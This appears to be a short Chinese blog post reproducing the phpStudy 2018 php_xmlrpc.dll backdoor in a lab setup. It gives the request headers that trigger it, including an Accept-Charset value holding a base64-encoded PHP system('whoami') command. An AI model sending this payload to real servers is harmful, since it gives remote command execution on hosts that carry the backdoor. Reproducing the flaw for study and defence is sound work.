phpstudy php_xmlrpc.dll後門漏洞復現

搭建環境:

phpstudy2018
php版本5.4

漏洞影響版本:5.2/5.4

漏洞利用

1、隨便訪問一個存在的php文件 我這裏就訪問index.php好了

2、進行index.php 進行抓包 再自行添加兩個字段payload 執行系統命令

Accept-Charset: ZWNobyBzeXN0ZW0oJ3dob2FtaScpOw==
Accept-Encoding: gzip,deflate

在這裏插入圖片描述

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章